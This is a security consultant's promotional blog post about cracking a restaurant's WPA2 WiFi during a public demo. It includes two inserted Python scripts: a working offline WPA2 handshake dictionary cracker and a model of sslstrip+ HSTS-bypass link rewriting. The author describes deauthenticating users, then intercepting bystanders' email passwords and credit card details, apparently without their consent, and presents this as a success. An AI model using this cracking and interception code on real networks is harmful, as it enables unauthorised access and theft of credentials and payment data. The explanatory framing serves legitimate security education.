Can we hack you in 10 minutes
Not too long ago I performed a public demonstration of how WPA2 passwords on wireless access points can be cracked.
The title of our demonstration was "Can we hack you in 10 minutes?" and the simple answer to that was yes.
We started the demonstration by scanning for wireless networks both near and far from us. During the scan I picked up the restaurant's WiFi name and targeted that specific access point. I could see every device and user connected to the AP and started my attack. I sent de-authentication frames to the AP and had the audience watch their devices lose connectivity to the WiFi; funny as it was to them, it actually happened and they were amazed. This works because de-authentication frames are unauthenticated management frames in WPA2, so anyone in radio range can forge them in the AP's name unless the network enforces Protected Management Frames (802.11w). The point of sending them was to kick all the users off the WiFi and wait for them to reconnect, so that I could capture the 4-way handshake.
What is a 4-way handshake?
Putting it in layman's terms, it is the exchange that happens every time your device (re)connects to the WiFi: the access point and your device prove to each other that they hold the same password, without ever sending the password itself over the air, and derive the session keys that will encrypt your traffic. The catch is that what gets captured (the random value each side sends plus an integrity check computed from a key derived from the password) is enough for an attacker to test password guesses offline, without ever talking to the access point again.
Back to the attack
After capturing the 4-way handshake I kept the capture running to collect as much data as possible. I used Wireshark (a network analysis program) to verify that I had indeed captured all four EAPOL messages of the handshake, and then converted the capture into the hash format that hashcat expects for WPA cracking.
I have built a crack station out of 8 top-of-the-range graphics cards of the kind used for crypto mining. I loaded the hash file into hashcat and it cracked the password within 14 seconds, as the crack station can test around 250 million passwords a second. That speed only matters when the password is in a wordlist or reachable by a few rules: 14 seconds at that rate is roughly 3.5 billion guesses, nowhere near enough to brute-force a long random passphrase, so the password was simply a weak one.
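To make concrete why a captured handshake is enough for an offline attack, here is an added example (not the author's tooling, and not what hashcat does on the GPU) that recovers a WPA2-PSK passphrase from handshake material with a plain dictionary attack. Everything a real attack would parse out of the capture (SSID, AP and client MAC, ANonce, SNonce, the EAPOL message-2 frame and its MIC) is constructed in the script from a chosen passphrase, so it runs offline and deterministically; the MAC addresses, nonces and wordlist are made up.

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example (not the author's tooling). The handshake material below is
constructed from a known passphrase so the script runs offline; a real
attack would parse the same fields out of a pcap.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations are the entire per-guess cost; GPUs parallelise them.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # IEEE 802.11 PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ...
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(MAC)||max(MAC)||min(nonce)||max(nonce)).
    # Only the KCK (first 16 bytes of the PTK) is needed to recompute the handshake MIC.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)[:16]


# EAPOL-Key layout: header(4) + descriptor type(1) + key info(2) + key length(2) +
# replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8) = 81 bytes, then the 16-byte MIC.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # WPA2 / key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(hs: dict, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_kck(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


def build_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a sniffed handshake (message 2, client -> AP)."""
    ap_mac = bytes.fromhex("001122334455")   # made-up BSSID
    sta_mac = bytes.fromhex("66778899aabb")  # made-up client MAC
    anonce = bytes(range(32))                # made-up nonces (real ones are random)
    snonce = bytes(range(32, 64))
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC present
        + b"\x00\x10"              # key length 16
        + (1).to_bytes(8, "big")   # replay counter
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
        + b"\x00" * 16             # MIC placeholder
        + b"\x00\x00"              # key data length 0
    )
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


HANDSHAKE = build_handshake("Summer2019!", "CafeWiFi")   # demo secret, chosen for this example
WORDLIST = ["password", "letmein", "cafewifi", "Summer2019!", "hunter2"]  # constructed wordlist

if __name__ == "__main__":
    print("recovered passphrase:", crack(HANDSHAKE, WORDLIST))
```

The whole attack is the loop in `crack`: one PBKDF2 derivation per guess, a PRF and one HMAC to check it. Nothing is sent to the access point, which is why a dictionary or rules attack on a captured handshake cannot be rate-limited or detected by the network, and why the only real defence is a passphrase that is not in any wordlist.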
I can now login to the WiFi network.
But I did not stop there……..
Sniffing Network Packets for Passwords and Profit.
While connected to the network I started a typical Man-in-the-Middle attack and ran an SSL stripper to intercept traffic that should have been protected by HTTPS, so that logins arrived in plain text despite HSTS. The HSTS-bypassing variant of the stripper works by rewriting hostnames in the pages it relays: it adds a fourth w, so www.example.com becomes wwww.example.com. The victim's browser has never seen that hostname, so it has no HSTS entry for it and happily sends plain HTTP; the attacker's proxy swaps the real hostname back in and talks HTTPS to the genuine site. The caveat is that this only works when the site's HSTS policy is not set with includeSubDomains on the parent domain (which preloading requires), because then the made-up subdomain is covered too and the browser upgrades the request itself.
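The following added example (not the author's tooling) models the two halves of that trick: the browser's HSTS lookup from RFC 6797 section 8.3 against a small constructed HSTS cache, and the link rewriting an sslstrip+-style proxy does on pages it relays to the victim. The www to wwww rewrite is the one described above; the "web." prefix used for hosts that do not start with www is an assumption for illustration, as are the hostnames in the cache.

```python
"""Why an HSTS-bypassing SSL stripper rewrites hostnames, and where that stops working.

Added example (not the author's tooling). Models the browser's HSTS check
(RFC 6797 section 8.3) and the proxy's link rewriting. The HSTS cache
contents and the "web." fallback prefix are constructed for illustration.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed browser-side HSTS state: host -> includeSubDomains flag.
HSTS_CACHE = {
    "www.bank.example": False,  # Strict-Transport-Security seen on www only
    "mail.example": True,       # header carried includeSubDomains (also required for preload)
}


def hsts_applies(host: str, cache: dict = HSTS_CACHE) -> bool:
    """RFC 6797 8.3: exact match, or a superdomain match with includeSubDomains."""
    host = host.lower().rstrip(".")
    if host in cache:
        return True
    labels = host.split(".")
    return any(cache.get(".".join(labels[i:])) for i in range(1, len(labels)))


def mangle_host(host: str) -> str:
    """Pick a hostname the victim's browser has never seen, so no HSTS entry applies."""
    return "w" + host if host.startswith("www.") else "web." + host  # "web." is an assumed fallback


def unmangle_host(host: str) -> str:
    """Reverse mapping used when the proxy forwards the request to the real site."""
    if host.startswith("wwww."):
        return host[1:]
    if host.startswith("web."):
        return host[4:]
    return host


def strip_url(url: str) -> str:
    """Rewrite an https link in a relayed page to plain http on a mangled host."""
    p = urlsplit(url)
    if p.scheme != "https":
        return url
    return urlunsplit(("http", mangle_host(p.hostname), p.path, p.query, p.fragment))


def stripping_succeeds(url: str, cache: dict = HSTS_CACHE) -> bool:
    """True if the victim's browser would follow the stripped link over plain HTTP."""
    victim_host = urlsplit(strip_url(url)).hostname
    return not hsts_applies(victim_host, cache)


if __name__ == "__main__":
    for u in ("https://www.bank.example/login", "https://mail.example/login"):
        print(u, "->", strip_url(u), "| stripped:", stripping_succeeds(u))
```

With the cache above, the bank login gets stripped because only www.bank.example has a policy and wwww.bank.example does not match it, while mail.example survives because its includeSubDomains policy covers web.mail.example. Note that a victim who has never visited a site has no cache entry at all, so stripping works regardless of what headers the site sends; only the preload list (which requires includeSubDomains) closes that first-visit window.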
I could see the usernames and passwords of users' e-mail accounts, as well as of any other site they logged into, and extract the data needed to access their accounts.
I even managed to catch credit card details being used.
All of this in 10 minutes.
If you need proper security measures put in place, please call us for a consultation free of charge and we will assist in securing your network.
Hope you enjoyed this. Gerhard Mohr - Ethical Hacker, SECURE ICT, IDAHO